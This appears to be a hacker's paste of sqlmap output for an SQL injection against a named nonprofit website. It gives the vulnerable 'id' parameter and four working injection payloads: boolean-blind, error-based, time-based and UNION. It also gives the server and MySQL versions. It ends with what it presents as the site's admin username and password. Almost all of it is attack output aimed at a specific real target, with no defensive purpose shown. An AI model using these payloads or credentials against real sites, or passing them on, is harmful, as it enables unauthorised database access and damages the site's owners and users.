www.bolsachicarestoration.org

1. Site : www.bolsachicarestoration.org
2.  
3. Parameter: id (GET)
4. Type: boolean-based blind
5. Title: AND boolean-based blind - WHERE or HAVING clause
6. Payload: id=16' AND 6416=6416 AND 'Egkd'='Egkd
7.  
8. Type: error-based
9. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
10. Payload: id=16' AND (SELECT 9887 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(9887=9887,1))),0x7170766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aLBx'='aLBx
11.  
12. Type: AND/OR time-based blind
13. Title: MySQL >= 5.0.12 AND time-based blind
14. Payload: id=16' AND SLEEP(5) AND 'XiZn'='XiZn
15.  
16. Type: UNION query
17. Title: Generic UNION query (NULL) - 3 columns
18. Payload: id=-4872' UNION ALL SELECT NULL,CONCAT(0x7170716a71,0x4d58734449414f68416e634347444a7643636974645750647954594b75534e78524873764546634a,0x7170766a71),NULL-- XbiF
19. ---
20. [21:41:24] [INFO] the back-end DBMS is MySQL
21. web application technology: Apache 2.4.23
22. back-end DBMS: MySQL >= 5.0
23.  
24.  
25. --------------- ADMIN ---------------
26. Username : SUK_IT_FUK3R
27. password : fuckoff